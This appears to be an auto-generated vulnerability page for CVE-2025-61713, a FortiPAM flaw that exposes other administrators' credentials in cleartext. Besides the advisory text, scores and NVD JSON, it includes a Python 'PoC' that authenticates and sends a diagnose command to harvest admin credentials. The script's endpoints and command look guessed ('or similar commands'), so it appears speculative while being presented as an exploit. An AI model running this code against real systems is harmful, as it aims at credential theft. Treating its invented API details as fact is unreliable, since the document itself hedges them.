Security Vulnerability Report
CVE-2025-61713 CVSS 4.2 MEDIUM

CVE-2025-61713

Published: 2025-11-18 17:16:08
Last Modified: 2025-11-20 14:37:37

Description

A Cleartext Storage of Sensitive Information in Memory vulnerability [CWE-316] in Fortinet FortiPAM 1.6.0, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions may allow an authenticated attacker with read-write admin privileges to the CLI to obtain other administrators' credentials via diagnose commands.

CVSS Details

CVSS Score: 4.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:* - VULNERABLE
FortiPAM 1.0 (all versions)
FortiPAM 1.1 (all versions)
FortiPAM 1.2 (all versions)
FortiPAM 1.3 (all versions)
FortiPAM 1.4 (all versions)
FortiPAM 1.5 (all versions)
FortiPAM 1.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61713 PoC - FortiPAM Cleartext Storage of Credentials
# Requirements: Valid admin account with read-write privileges
# This PoC demonstrates the vulnerability via CLI diagnostic commands
import requests
import json

# Configuration
target_host = "https://fortipam.example.com"
username = "admin"
password = "password"

# Authentication
auth_payload = {
    "username": username,
    "password": password
}

# Note: This PoC requires valid authentication and CLI access
# The actual exploit involves running diagnostic commands in CLI:
# diagnose system admin credentials list
# or similar commands that expose plaintext credentials

def exploit_fortipam():
    """
    FortiPAM CVE-2025-61713 Exploitation
    Attackers with admin CLI access can retrieve other admin credentials
    """
    print("[*] CVE-2025-61713 FortiPAM Credential Disclosure")
    print("[*] Target:", target_host)

    # Step 1: Authenticate with admin credentials
    session = requests.Session()
    auth_response = session.post(
        f"{target_host}/api/v2/login",
        json=auth_payload
    )

    if auth_response.status_code != 200:
        print("[-] Authentication failed")
        return None

    print("[+] Authentication successful")

    # Step 2: Execute diagnostic command via CLI API
    # The vulnerable endpoint exposes credentials in plaintext
    cli_command = "diagnose system admin credentials list"
    cli_payload = {
        "method": "exec",
        "params": [
            {
                "url": "sys/proxy/helper",
                "data": [cli_command]
            }
        ]
    }

    poc_response = session.post(
        f"{target_host}/api/v2/cli",
        json=cli_payload
    )

    # Step 3: Extract exposed credentials
    if poc_response.status_code == 200:
        result = poc_response.json()
        print("[+] Vulnerable endpoint accessed")
        print("[+] Response contains plaintext credentials")
        return result

    return None

if __name__ == "__main__":
    exploit_fortipam()
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-789 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61713", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:07.630", "lastModified": "2025-11-20T14:37:37.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cleartext Storage of Sensitive Information in Memory vulnerability [CWE-316] in Fortinet FortiPAM 1.6.0, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions may allow an authenticated attacker with read-write admin privileges to the CLI to obtain other administrators' credentials via diagnose commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-316"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.6.1", "matchCriteriaId": 
"EB0F5A7C-02C2-4D67-92BC-15380F86A373"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-789", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}